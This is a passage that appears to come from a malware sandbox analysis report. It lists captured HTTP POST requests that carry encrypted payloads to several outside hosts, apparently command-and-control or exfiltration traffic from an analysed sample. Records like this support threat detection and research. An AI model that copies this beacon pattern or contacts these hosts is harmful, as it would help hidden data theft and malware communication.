mBdTjXAg2AdJK7fZgzlF6iPRJUkYUMyjpGaYZjwInXBfKWIp44ak+KIbi5rEJYKWNe82JgpVZ2v7LjjDu6fhdNhW6qgRjqBHbzwyoWmwgItx5t2LwFz3CDE4W9+tUZV0PRzdxD2NFU+J4IGe3lSGG1VPBlUmLRpfck+Q6nWtSx2FAog4EgJb+txsBVcyCNuKzxqqJKeNEUJcUAUVd8tzkTuQKsTJjjaPCFHjt8NfaUyGf95fYSQl1BTZEtkn2eMhQL55beDfQ/nWtgmwnVwkhT4uNctqd4ifhIc64m8Fy0pBh3Az3xaTN1T2PLGhRa1PvAlyiNuPAUcjeBaWZWJAsi63eKX/rlGEsRsDRkAt7ADZGeNgrEt5mnb4+sQWTMVCX1JxpAdOmDsIq58zjgZ+e5tGAdQJukXISvm0bbTqqG4svOL+3YRXnDcrguKhAb2clonngfMx836pB+feFSJmRIBqXzq0wMH96RhBCpoi8+e3AA/k+0E3ShO4xr7kwIyVr+M7lBVeyi4i3BZJQOjSBI+ZT8Gsls/GDgtI0pPBnAdi+2vHiRZ/KGQmN1PbmI+1
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 62 6d 76 46 38 44 71 72 38 52 53 6b 56 75 5a 57 33 63 47 58 54 33 30 49 45 35 2b 71 69 36 2f 73 44 67 48 47 6b 65 64 7a 73 78 62 36 45 57 4e 54 67 75 61 2f 79 4d 37 52 31 79 5a 77 65 75 58 62 75 4c 78 70 4f 41 32 58 38 6d 4f 37 54 50 63 6c 31 6a 52 50 50 65 30 53 4b 6d 49 6c 45 77 42 70 55 43 70 57 73 53 68 6e 6e 58 71 36 43 77 65 61 55 41 6e 36 62 6b 47 50 35 66 4e 30 31 45 4d 38 75 64 39 35 54 69 69 55 62 6d 4c 4b 67 78 2b 37 46 36 6a 4c 57 58 59 68 32 31 54 45 4b 6d 78 62 4e 33 72 54 2b 32 41 33 34 43 43 39 4c 31 6f 4d 58 34 65 4c 78 42 6d 4a 79 71 46 72 56 74 39 46 6b 69 4b 61 2f 6d 32 36 5a 4e 42 43 68 59 79 53 78 58 44 62 57 43 78 7a 62 79 4a 6d 73 4f 55 6b 45 63 35 6c 76 45 35 2b 6e 2f 6d 6f 33 56 2b 59 69 32 6f 47 5a 4a 4e 61 61 64 52 5a 38 57 32 56 4b 7a 6c 4d 7a 69 61 32 78 4b 38 45 71 2b 6e 31 4a 70 69 6d 53 4b 46 55 48 33 39 57 42 77 58 33 69 53 33 77 55 43 45 44 55 7a 73 39 41 6b 44 32 77 6a 6d 34 66 6b 31 78 4e 4d 6e 68 6e 45 58 4f 32 34 55 61 67 78 57 36 55 52 74 67 55 68 30 62 59 42 6a 79 79 70 2f 46 35 4b 51 36 5a 4a 46 6b 6e 4f 7a 79 69 4c 37 2f 4b 58 4e 6c 54 47 72 6c 6c 64 73 39 2f 63 6f 61 2f 62 71 2b 42 55 5a 61 77 71 56 41 2b 47 70 4c 5a 58 6d 65 68 6b 6f 42 47 58 59 4b 72 42 45 53 30 30 67 67 2b 62 39 79 6a 55 78 78 71 58 4f 4c 4f 71 48 53 4e 35 32 75 49 45 42 39 2f 63 56 72 55 4a 33 4b 48 66 63 64 71 39 65 55 79 55 71 61 77 52 7a 6f 72 76 72 32 33 44 4e 77 4a 48 49 75 44 6a 76 4d 46 64 78 2b 4a 49 4f 6e 34 30 78 6b 53 57 72 36 68 2b 4b 38 39 4f 51 5a 2b 72 55 51 4b 58 46 77 43 77 44 2f 32 44 55 65 70 54 76 31 5a 69 53 72 62 51 7a 42 70 4e 69 51 32 6e 71 5a 4b 39 61 38 46 66 56 61 73 65 4b 38 7a 45 37 66 36 48 49 42 77 56 31 31 65 47 2f 47 72 50 41 61 77 30 61 64 6a 30 6c 32 35 79 52 63 74 67 3d 3d Data Ascii: bmvF8Dqr8RSkVuZW3cGXT30IE5+qi6/sDgHGkedzsxb6EWNTgua/yM7R1yZweuXbuLxpOA2X8mO7TPcl1jRPPe0SKmIlEwBpUCpWsShnnXq6CweaUAn6bkGP5fN01EM8ud95TiiUbmLKgx+7F6jLWXYh21TEKmxbN3rT+2A34CC9L1oMX4eLxBmJyqFrVt9FkiKa/m26ZNBChYySxXDbWCxzbyJmsOUkEc5lvE5+n/mo3V+Yi2oGZJNaadRZ8W2VKzlMzia2xK8Eq+n1JpimSKFUH39WBwX3iS3wUCEDUzs9AkD2wjm4fk1xNMnhnEXO24UagxW6URtgUh0bYBjyyp/F5KQ6ZJFknOzyiL7/KXNlTGrllds9/coa/bq+BUZawqVA+GpLZXmehkoBGXYKrBES00gg+b9yjUxxqXOLOqHSN52uIEB9/cVrUJ3KHfcdq9eUyUqawRzorvr23DNwJHIuDjvMFdx+JIOn40xkSWr6h+K89OQZ+rUQKXFwCwD/2DUepTv1ZiSrbQzBpNiQ2nqZK9a8FfVaseK8zE7f6HIBwV11eG/GrPAaw0adj0l25yRctg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 73 75 6e 4b 36 76 77 5a 41 68 57 4c 50 6a 7a 6f 70 36 32 41 72 59 2f 69 4b 54 71 55 68 75 58 4e 38 4d 71 34 6d 6a 63 6f 6d 37 4a 65 59 61 7a 47 68 42 51 4c 7a 72 73 4e 5a 64 77 67 36 78 43 7a 78 58 2b 2b 57 75 65 56 33 50 7a 78 49 56 57 2f 73 61 4d 4b 79 2f 4e 49 49 65 45 36 45 65 65 53 4d 39 34 32 37 70 30 37 31 55 63 57 47 78 58 72 4a 64 46 38 58 71 64 43 37 64 70 69 63 62 73 33 45 64 79 53 4b 37 6c 65 4a 48 36 39 31 41 65 4c 49 6c 53 57 65 52 41 61 71 6d 78 53 65 38 6e 6d 70 65 48 46 53 4f 70 70 79 30 66 48 30 4d 59 74 68 6f 61 71 36 48 46 48 73 69 67 51 77 4b 65 59 4d 69 73 79 73 4f 6d 30 4e 41 49 46 30 69 4c 4c 55 78 38 4c 70 75 32 5a 39 31 4d 4a 42 55 38 43 45 46 42 66 35 55 30 41 63 71 69 57 4f 66 59 44 75 37 72 6e 73 70 64 44 56 74 36 30 52 2b 4f 68 5a 75 56 38 6d 70 41 43 74 2b 51 69 64 64 58 6d 64 51 31 67 57 49 50 45 34 55 48 36 6f 42 51 67 59 7a 72 4e 79 71 35 6d 47 56 68 6c 4a 51 36 4b 64 45 4e 2f 6d 2b 4a 47 50 34 63 69 5a 53 38 6e 32 56 77 44 68 47 51 62 66 61 6d 50 6b 6e 39 51 4a 53 77 55 34 64 4d 75 35 35 4a 51 58 63 66 78 31 38 6c 49 68 50 7a 75 36 65 36 58 6f 69 56 31 39 4c 41 44 6e 50 77 69 42 31 71 5a 68 4f 6b 51 61 5a 6a 6b 7a 39 73 76 53 4c 44 53 6a 30 78 78 30 6a 68 6f 63 4d 46 31 63 49 68 77 31 4d 4d 2b 4e 5a 52 61 75 33 74 42 75 30 66 56 67 4b 44 46 71 65 44 73 6c 6b 78 41 55 32 6e 31 55 70 74 33 45 51 69 4a 77 4e 32 7a 68 7a 6a 4c 74 6f 52 67 36 35 44 36 65 76 71 78 42 67 47 69 55 71 30 4b 4f 63 73 37 58 52 49 57 69 4a 69 52 39 32 57 6a 48 54 7a 45 62 2b 37 59 45 53 69 58 62 51 48 59 4f 49 4e 72 67 64 69 4b 42 65 4f 2f 2f 51 32 77 45 7a 56 4d 78 41 39 74 31 46 53 66 63 41 3d 3d Data Ascii: sunK6vwZAhWLPjzop62ArY/iKTqUhuXN8Mq4mjcom7JeYazGhBQLzrsNZdwg6xCzxX++WueV3PzxIVW/saMKy/NIIeE6EeeSM9427p071UcWGxXrJdF8XqdC7dpicbs3EdySK7leJH691AeLIlSWeRAaqmxSe8nmpeHFSOppy0fH0MYthoaq6HFHsigQwKeYMisysOm0NAIF0iLLUx8Lpu2Z91MJBU8CEFBf5U0AcqiWOfYDu7rnspdDVt60R+OhZuV8mpACt+QiddXmdQ1gWIPE4UH6oBQgYzrNyq5mGVhlJQ6KdEN/m+JGP4ciZS8n2VwDhGQbfamPkn9QJSwU4dMu55JQXcfx18lIhPzu6e6XoiV19LADnPwiB1qZhOkQaZjkz9svSLDSj0xx0jhocMF1cIhw1MM+NZRau3tBu0fVgKDFqeDslkxAU2n1Upt3EQiJwN2zhzjLtoRg65D6evqxBgGiUq0KOcs7XRIWiJiR92WjHTzEb+7YESiXbQHYOINrgdiKBeO//Q2wEzVMxA9t1FSfcA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 69 75 35 6e 35 68 56 56 38 52 54 68 51 38 47 30 2f 4b 4f 6a 77 77 37 69 7a 46 51 6a 4a 70 4d 4e 47 64 4e 64 50 30 2b 44 4b 69 75 76 53 6b 61 67 33 51 45 57 44 4e 2f 6f 67 63 41 54 67 53 65 4b 46 49 36 50 42 71 36 74 51 4b 74 58 42 36 62 74 47 6a 4c 4e 37 4a 6b 5a 39 53 6e 31 6a 6e 52 45 2f 59 56 6a 43 67 75 56 69 6d 65 71 44 68 56 70 39 38 6d 70 4b 73 6f 62 45 78 6d 79 45 33 72 73 79 41 47 4e 43 59 2f 38 75 57 45 77 52 74 70 64 30 6a 31 2b 6a 4f 33 4c 70 73 6a 39 6a 34 2b 47 32 77 58 49 39 46 6a 37 53 41 4e 43 48 49 36 39 77 32 77 43 4d 78 38 61 5a 6d 74 37 53 69 37 68 76 72 41 74 34 2f 4e 42 2f 50 77 61 6f 4e 52 46 35 4a 39 55 64 46 39 67 44 6d 65 46 37 46 30 6d 6c 52 57 4f 48 74 41 32 55 73 57 74 42 79 4e 66 59 53 52 34 32 5a 55 2b 58 78 50 47 63 76 67 70 54 38 55 57 54 73 33 6f 69 6c 47 57 76 54 31 6a 5a 4e 36 71 56 74 52 48 58 31 64 62 62 46 79 51 61 6c 6f 52 6f 37 33 44 79 62 44 76 49 65 42 4f 2b 66 63 55 35 2b 2f 43 51 68 55 69 65 61 39 4a 46 33 55 74 6d 51 34 6e 4e 49 71 35 72 47 73 4e 4a 34 54 33 36 71 34 4c 5a 4b 6d 4f 37 42 52 49 64 4b 38 76 63 78 65 63 43 70 68 5a 76 48 63 64 68 79 31 37 41 70 45 70 2b 7a 6c 4a 5a 76 64 39 5a 66 76 56 68 42 66 6d 34 66 44 2f 63 56 61 39 4c 4d 49 51 6c 52 6d 50 7a 43 36 62 39 64 56 45 49 4f 55 6b 61 45 4c 51 66 55 73 4a 39 77 38 68 77 6c 7a 31 57 53 33 72 34 54 70 6d 69 70 41 2f 34 74 47 47 6f 50 6f 37 39 57 42 4c 38 54 4f 4f 7a 70 53 53 45 4b 65 6d 64 2b 61 77 72 44 75 73 43 43 52 6f 63 44 6a 62 69 42 4d 7a 70 76 4d 6f 50 73 70 32 52 55 4f 35 61 2b 46 38 68 47 5a 56 68 76 59 69 6e 55 76 65 31 39 36 37 2f 41 53 68 33 6f 64 77 68 70 67 53 30 47 50 66 71 78 69 42 59 7a 4b 79 52 2b 52 6a 59 66 42 45 77 67 7a 49 2f 4e 66 71 71 32 49 4d 51 49 7a 64 69 48 39 6f 69 4f 70 2b 48 67 4e 65 Data Ascii: iu5n5hVV8RThQ8G0/KOjww7izFQjJpMNGdNdP0+DKiuvSkag3QEWDN/ogcATgSeKFI6PBq6tQKtXB6btGjLN7JkZ9Sn1jnRE/YVjCguVimeqDhVp98mpKsobExmyE3rsyAGNCY/8uWEwRtpd0j1+jO3Lpsj9j4+G2wXI9Fj7SANCHI69w2wCMx8aZmt7Si7hvrAt4/NB/PwaoNRF5J9UdF9gDmeF7F0mlRWOHtA2UsWtByNfYSR42ZU+XxPGcvgpT8UWTs3oilGWvT1jZN6qVtRHX1dbbFyQaloRo73DybDvIeBO+fcU5+/CQhUiea9JF3UtmQ4nNIq5rGsNJ4T36q4LZKmO7BRIdK8vcxecCphZvHcdhy17ApEp+zlJZvd9ZfvVhBfm4fD/cVa9LMIQlRmPzC6b9dVEIOUkaELQfUsJ9w8hwlz1WS3r4TpmipA/4tGGoPo79WBL8TOOzpSSEKemd+awrDusCCRocDjbiBMzpvMoPsp2RUO5a+F8hGZVhvYinUve1967/ASh3odwhpgS0GPfqxiBYzKyR+RjYfBEwgzI/Nfqq2IMQIzdiH9oiOp+HgNe
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6e 31 4c 55 30 43 70 43 41 52 55 48 57 69 61 6b 44 51 76 32 51 2b 33 73 47 39 68 61 64 52 69 73 2f 68 59 39 63 2b 66 4d 79 6f 77 32 50 7a 73 63 4e 4f 76 46 44 31 4d 75 67 59 54 64 75 73 39 4f 79 51 36 36 54 30 49 6b 4c 48 6a 6d 39 43 75 68 56 4d 63 39 41 54 31 41 4f 75 4b 31 53 33 44 4a 4d 2f 39 59 44 4b 54 63 77 69 62 6f 79 6d 65 6d 38 2f 33 44 34 2f 69 49 72 32 37 6a 30 38 4d 66 79 6b 39 61 30 4d 72 5a 68 32 37 63 6f 51 75 33 48 36 7a 2b 62 46 39 77 54 47 4c 41 62 72 75 66 6d 47 30 58 43 36 4c 78 70 6d 4a 75 59 2f 78 2f 4b 59 58 41 76 44 42 46 4b 66 48 61 6e 58 41 46 79 66 73 58 32 48 48 43 57 55 6e 4d 75 52 43 61 41 44 46 61 6b 2f 6a 55 76 34 57 70 4b 35 47 4d 74 4d 43 4f 77 4b 4d 45 30 6e 78 4e 5a 6c 6a 2b 53 2b 4a 6e 46 6e 64 2f 48 43 34 70 31 5a 48 53 56 41 49 37 59 41 76 47 71 45 39 79 61 54 53 6b 46 65 78 42 47 56 65 67 30 53 36 65 48 69 41 6f 48 70 76 74 45 32 61 43 44 4a 79 72 45 75 46 37 74 35 4c 34 45 34 42 63 2b 62 78 70 55 69 63 39 7a 62 2b 64 59 75 56 4b 42 6d 30 51 7a 73 7a 4c 53 6e 48 72 52 48 51 4d 54 68 62 43 34 2f 71 4e 35 4b 32 73 70 47 53 4e 38 6b 66 33 47 48 43 67 71 58 7a 63 41 44 4d 67 4a 53 76 65 78 51 46 6a 69 77 4d 30 34 6c 67 65 2b 7a 62 61 78 34 45 50 32 54 4d 59 77 46 2b 66 37 37 47 77 46 4c 4a 64 71 65 43 67 2b 57 41 30 41 75 49 76 77 38 4c 51 7a 44 6a 57 4f 43 77 66 70 53 31 33 7a 6b 42 31 4f 34 7a 77 4e 49 6b 49 70 78 54 37 70 78 4c 64 2f 4b 41 41 78 2b 47 42 6c 6d 56 54 74 6a 4b 50 6d 58 5a 36 7a 33 6a 73 61 62 76 42 4a 57 42 63 4a 53 30 54 37 2f 5a 76 37 75 4d 36 4c 6f 36 4b 44 62 65 39 55 39 2b 59 4c 37 59 48 78 44 38 69 43 6f 68 6a 53 6e 78 79 47 43 34 6c 49 76 6c 5a 31 61 63 77 57 67 4a 39 59 73 6d 55 64 6c 61 50 45 4e 2f 4b 54 71 32 72 2f 75 52 4d 45 47 77 5a 6b 6b 75 33 Data Ascii: n1LU0CpCARUHWiakDQv2Q+3sG9hadRis/hY9c+fMyow2PzscNOvFD1MugYTdus9OyQ66T0IkLHjm9CuhVMc9AT1AOuK1S3DJM/9YDKTcwiboymem8/3D4/iIr27j08Mfyk9a0MrZh27coQu3H6z+bF9wTGLAbrufmG0XC6LxpmJuY/x/KYXAvDBFKfHanXAFyfsX2HHCWUnMuRCaADFak/jUv4WpK5GMtMCOwKME0nxNZlj+S+JnFnd/HC4p1ZHSVAI7YAvGqE9yaTSkFexBGVeg0S6eHiAoHpvtE2aCDJyrEuF7t5L4E4Bc+bxpUic9zb+dYuVKBm0QzszLSnHrRHQMThbC4/qN5K2spGSN8kf3GHCgqXzcADMgJSvexQFjiwM04lge+zbax4EP2TMYwF+f77GwFLJdqeCg+WA0AuIvw8LQzDjWOCwfpS13zkB1O4zwNIkIpxT7pxLd/KAAx+GBlmVTtjKPmXZ6z3jsabvBJWBcJS0T7/Zv7uM6Lo6KDbe9U9+YL7YHxD8iCohjSnxyGC4lIvlZ1acwWgJ9YsmUdlaPEN/KTq2r/uRMEGwZkku3
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 62 6d 76 46 38 44 71 72 38 52 53 6b 56 75 5a 57 33 63 47 58 54 33 30 49 45 35 2b 71 69 36 2f 73 44 67 48 47 6b 65 64 7a 73 78 62 36 45 57 4e 54 67 75 61 2f 79 4d 37 52 31 79 5a 77 65 75 58 62 75 4c 78 70 4f 41 32 58 38 6d 4f 37 54 50 63 6c 31 6a 52 50 50 65 30 53 4b 6d 49 6c 45 77 42 70 55 43 70 57 73 53 68 6e 6e 58 71 36 43 77 65 61 55 41 6e 36 62 6b 47 50 35 66 4e 30 31 45 4d 38 75 64 39 35 54 69 69 55 62 6d 4c 4b 67 78 2b 37 46 36 6a 4c 57 58 59 68 32 31 54 45 4b 6d 78 62 4e 33 72 54 2b 32 41 33 34 43 43 39 4c 31 6f 4d 58 34 65 4c 78 42 6d 4a 79 71 46 72 56 74 39 46 6b 69 4b 61 2f 6d 32 36 5a 4e 42 43 68 59 79 53 78 58 44 62 57 43 78 7a 62 79 4a 6d 73 4f 55 6b 45 63 35 6c 76 45 35 2b 6e 2f 6d 6f 33 56 2b 59 69 32 6f 47 5a 4a 4e 61 61 64 52 5a 38 57 32 56 4b 7a 6c 4d 7a 69 61 32 78 4b 38 45 71 2b 6e 31 4a 70 69 6d 53 4b 46 55 48 33 39 57 42 77 58 33 69 53 33 77 55 43 45 44 55 7a 73 39 41 6b 44 32 77 6a 6d 34 66 6b 31 78 4e 4d 6e 68 6e 45 58 4f 32 34 55 61 67 78 57 36 55 52 74 67 55 68 30 62 59 42 6a 79 79 70 2f 46 35 4b 51 36 5a 4a 46 6b 6e 4f 7a 79 69 4c 37 2f 4b 58 4e 6c 54 47 72 6c 6c 64 73 39 2f 63 6f 61 2f 62 71 2b 42 55 5a 61 77 71 56 41 2b 47 70 4c 5a 58 6d 65 68 6b 6f 42 47 58 59 4b 72 42 45 53 30 30 67 67 2b 62 39 79 6a 55 78 78 71 58 4f 4c 4f 71 48 53 4e 35 32 75 49 45 42 39 2f 63 56 72 55 4a 33 4b 48 66 63 64 71 39 65 55 79 55 71 61 77 52 7a 6f 72 76 72 32 33 44 4e 77 4a 48 49 75 44 6a 76 4d 46 64 78 2b 4a 49 4f 6e 34 30 78 6b 53 57 72 36 68 2b 4b 38 39 4f 51 5a 2b 72 55 51 4b 58 46 77 43 77 44 2f 32 44 55 65 70 54 76 31 5a 69 53 72 62 51 7a 42 70 4e 69 51 32 6e 71 5a 4b 39 61 38 46 66 56 61 73 65 4b 38 7a 45 37 66 36 48 49 42 77 56 31 31 65 47 2f 47 72 50 41 61 77 30 61 64 6a 30 6c 32 35 79 52 63 74 67 3d 3d Data Ascii: bmvF8Dqr8RSkVuZW3cGXT30IE5+qi6/sDgHGkedzsxb6EWNTgua/yM7R1yZweuXbuLxpOA2X8mO7TPcl1jRPPe0SKmIlEwBpUCpWsShnnXq6CweaUAn6bkGP5fN01EM8ud95TiiUbmLKgx+7F6jLWXYh21TEKmxbN3rT+2A34CC9L1oMX4eLxBmJyqFrVt9FkiKa/m26ZNBChYySxXDbWCxzbyJmsOUkEc5lvE5+n/mo3V+Yi2oGZJNaadRZ8W2VKzlMzia2xK8Eq+n1JpimSKFUH39WBwX3iS3wUCEDUzs9AkD2wjm4fk1xNMnhnEXO24UagxW6URtgUh0bYBjyyp/F5KQ6ZJFknOzyiL7/KXNlTGrllds9/coa/bq+BUZawqVA+GpLZXmehkoBGXYKrBES00gg+b9yjUxxqXOLOqHSN52uIEB9/cVrUJ3KHfcdq9eUyUqawRzorvr23DNwJHIuDjvMFdx+JIOn40xkSWr6h+K89OQZ+rUQKXFwCwD/2DUepTv1ZiSrbQzBpNiQ2nqZK9a8FfVaseK8zE7f6HIBwV11eG/GrPAaw0adj0l25yRctg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 59 63 39 65 36 65 61 54 79 52 58 6a 46 44 4b 76 67 52 6f 50 47 67 6c 32 32 52 37 47 62 33 33 47 65 67 5a 51 35 50 30 30 54 36 63 2f 64 4b 75 4b 4d 74 45 50 41 62 30 6f 42 42 51 46 72 77 73 48 6b 6a 54 45 78 70 56 50 44 58 59 55 6e 37 36 65 71 78 46 2b 4a 37 66 72 49 62 32 6f 4e 70 36 44 5a 42 37 43 4c 51 6c 34 32 49 6c 7a 6d 67 6c 78 68 68 41 48 73 56 61 45 77 70 78 46 4c 33 6f 52 58 37 4e 2b 45 2f 76 56 30 4e 4d 6a 32 55 39 48 36 53 4c 71 6e 49 47 45 44 30 4d 39 6f 48 36 50 71 6e 46 76 4c 36 4c 62 6d 49 2b 37 67 56 46 50 45 67 4b 78 45 47 44 50 58 53 78 52 76 55 4b 66 63 4a 46 68 5a 7a 4b 6c 71 4e 51 75 42 7a 6e 45 41 79 45 2f 4c 76 47 77 47 35 67 44 6e 4b 75 79 55 46 70 57 4c 70 6b 37 65 5a 6a 6c 4b 54 4b 6b 41 61 66 6b 65 39 47 78 36 58 76 75 61 47 39 4e 49 6e 68 44 43 6b 39 4f 39 47 41 76 79 63 46 66 32 47 34 4b 34 58 52 2f 41 6d 5a 6e 36 63 71 33 48 65 65 45 31 75 77 62 79 45 30 36 79 6d 57 78 33 56 5a 33 6c 4e 63 2f 73 68 69 34 4f 48 30 43 6d 75 69 63 62 42 48 78 66 75 56 6f 66 4b 72 62 37 77 64 37 55 39 4d 6c 76 4d 7a 48 76 35 37 4e 67 71 30 34 41 38 45 2b 51 34 6d 51 2f 67 53 78 38 48 68 45 5a 47 45 75 30 49 67 47 59 4b 72 6a 7a 63 6c 58 46 65 56 43 39 54 34 66 36 75 4b 46 6b 4a 54 4f 4b 34 50 49 34 73 47 64 35 6f 64 74 69 51 4c 4f 50 78 36 75 35 58 69 75 4c 78 34 63 52 41 55 68 49 67 33 52 53 34 6e 75 75 30 30 70 54 74 47 67 42 4f 49 66 52 78 4d 68 4f 65 44 47 54 51 79 56 33 32 72 71 61 55 75 78 49 63 32 39 63 62 6d 69 6f 64 53 47 45 6c 52 35 36 42 4e 66 5a 69 57 51 69 34 6f 34 67 42 57 4f 53 2b 56 61 59 72 47 62 57 4a 6a 52 73 32 32 64 6d 53 33 6a 68 39 39 42 66 30 75 57 77 6f 77 2f 50 73 65 5a 4a 58 55 75 6c 42 62 49 2b 2f 46 47 54 78 6d 63 76 2f 67 6f 44 7a 42 2b 4e 6a 77 78 7a 78 55 3d Data Ascii: Yc9e6eaTyRXjFDKvgRoPGgl22R7Gb33GegZQ5P00T6c/dKuKMtEPAb0oBBQFrwsHkjTExpVPDXYUn76eqxF+J7frIb2oNp6DZB7CLQl42IlzmglxhhAHsVaEwpxFL3oRX7N+E/vV0NMj2U9H6SLqnIGED0M9oH6PqnFvL6LbmI+7gVFPEgKxEGDPXSxRvUKfcJFhZzKlqNQuBznEAyE/LvGwG5gDnKuyUFpWLpk7eZjlKTKkAafke9Gx6XvuaG9NInhDCk9O9GAvycFf2G4K4XR/AmZn6cq3HeeE1uwbyE06ymWx3VZ3lNc/shi4OH0CmuicbBHxfuVofKrb7wd7U9MlvMzHv57Ngq04A8E+Q4mQ/gSx8HhEZGEu0IgGYKrjzclXFeVC9T4f6uKFkJTOK4PI4sGd5odtiQLOPx6u5XiuLx4cRAUhIg3RS4nuu00pTtGgBOIfRxMhOeDGTQyV32rqaUuxIc29cbmiodSGElR56BNfZiWQi4o4gBWOS+VaYrGbWJjRs22dmS3jh99Bf0uWwow/PseZJXUulBbI+/FGTxmcv/goDzB+NjwxzxU=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 66 39 51 6e 67 54 37 68 76 52 55 4f 4c 47 79 4a 43 52 66 67 2f 53 45 68 4c 4c 62 2b 45 38 75 41 55 6e 30 53 39 6e 57 68 4e 58 4c 34 53 6c 62 58 6b 47 37 78 43 48 78 78 77 54 6a 73 4f 58 43 6f 59 69 2f 65 2f 47 70 39 4a 42 6d 63 33 47 7a 74 32 70 6a 35 38 4c 7a 35 73 39 45 62 48 6b 41 49 30 72 57 74 33 38 70 58 73 48 4d 51 69 2f 30 73 35 32 51 54 4f 64 70 4d 78 64 68 72 59 72 53 42 63 4e 46 58 4f 6b 6f 49 54 72 76 39 4a 6e 6f 64 75 59 6f 38 30 68 44 65 76 4c 43 2b 66 6c 30 72 66 6d 77 6c 2f 67 50 48 4d 68 73 30 78 62 37 62 6b 6b 6a 52 54 6b 5a 36 32 38 6b 4d 6a 71 4f 34 7a 6b 36 53 45 50 4b 68 71 4c 61 42 6f 4b 5a 56 2f 36 2f 31 6b 79 32 6f 2f 42 78 74 4c 53 63 52 63 76 64 6c 72 73 58 42 70 5a 66 33 37 39 4d 4f 32 68 70 63 63 76 78 4b 5a 48 43 78 61 42 53 6b 64 73 4c 56 6c 68 59 37 6d 4f 62 42 68 6b 33 76 67 55 64 33 4d 41 76 44 53 72 50 2f 39 43 44 57 61 48 74 33 31 30 75 33 70 44 42 72 76 6a 66 41 6e 65 30 50 30 76 78 75 66 79 59 64 41 4f 6f 55 34 4d 4b 6d 57 56 4a 63 6c 4a 5a 39 41 73 36 51 37 49 48 69 46 72 4e 38 77 77 51 37 77 57 6f 46 70 38 7a 71 38 45 58 6b 42 45 70 48 72 51 42 4a 48 4f 39 4c 6e 45 69 64 58 39 7a 76 4c 52 37 37 4a 73 56 62 6f 74 33 69 55 74 69 34 66 55 51 44 2b 72 73 4c 34 58 4e 48 63 62 6e 35 34 64 78 63 34 43 51 6f 2f 46 6a 37 41 36 4b 4a 4d 50 5a 50 58 53 47 56 61 41 55 75 33 56 44 67 44 30 6c 63 33 2f 4b 66 38 65 33 52 4c 59 31 6d 45 31 61 51 31 79 6a 38 73 55 52 4d 5a 63 76 6e 70 48 32 31 6a 71 4e 66 57 6a 79 4a 4a 35 58 44 54 47 79 67 6f 6e 65 50 53 73 6d 56 55 4b 67 4e 71 64 69 68 31 30 39 5a 51 44 46 39 76 2f 48 62 64 6a 5a 4f 36 6e 69 76 34 35 37 68 43 53 32 5a 6f 35 38 77 30 4c 72 73 46 43 77 52 70 38 4a 79 32 78 62 74 45 6b 6c 52 51 6f 32 67 79 6a 43 73 50 6c 38 68 66 66 74 59 72 5a 78 39 46 5a 2f 2b 39 6a 59 4a 66 68 63 3d Data Ascii: f9QngT7hvRUOLGyJCRfg/SEhLLb+E8uAUn0S9nWhNXL4SlbXkG7xCHxxwTjsOXCoYi/e/Gp9JBmc3Gzt2pj58Lz5s9EbHkAI0rWt38pXsHMQi/0s52QTOdpMxdhrYrSBcNFXOkoITrv9JnoduYo80hDevLC+fl0rfmwl/gPHMhs0xb7bkkjRTkZ628kMjqO4zk6SEPKhqLaBoKZV/6/1ky2o/BxtLScRcvdlrsXBpZf379MO2hpccvxKZHCxaBSkdsLVlhY7mObBhk3vgUd3MAvDSrP/9CDWaHt310u3pDBrvjfAne0P0vxufyYdAOoU4MKmWVJclJZ9As6Q7IHiFrN8wwQ7wWoFp8zq8EXkBEpHrQBJHO9LnEidX9zvLR77JsVbot3iUti4fUQD+rsL4XNHcbn54dxc4CQo/Fj7A6KJMPZPXSGVaAUu3VDgD0lc3/Kf8e3RLY1mE1aQ1yj8sURMZcvnpH21jqNfWjyJJ5XDTGygonePSsmVUKgNqdih109ZQDF9v/HbdjZO6niv457hCS2Zo58w0LrsFCwRp8Jy2xbtEklRQo2gyjCsPl8hfftYrZx9FZ/+9jYJfhc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 59 63 39 65 36 65 61 54 79 52 58 6a 46 44 4b 76 67 52 6f 50 47 67 6c 32 32 52 37 47 62 33 33 47 65 67 5a 51 35 50 30 30 54 36 63 2f 64 4b 75 4b 4d 74 45 50 41 62 30 6f 42 42 51 46 72 77 73 48 6b 6a 54 45 78 70 56 50 44 58 59 55 6e 37 36 65 71 78 46 2b 4a 37 66 72 49 62 32 6f 4e 70 36 44 5a 42 37 43 4c 51 6c 34 32 49 6c 7a 6d 67 6c 78 68 68 41 48 73 56 61 45 77 70 78 46 4c 33 6f 52 58 37 4e 2b 45 2f 76 56 30 4e 4d 6a 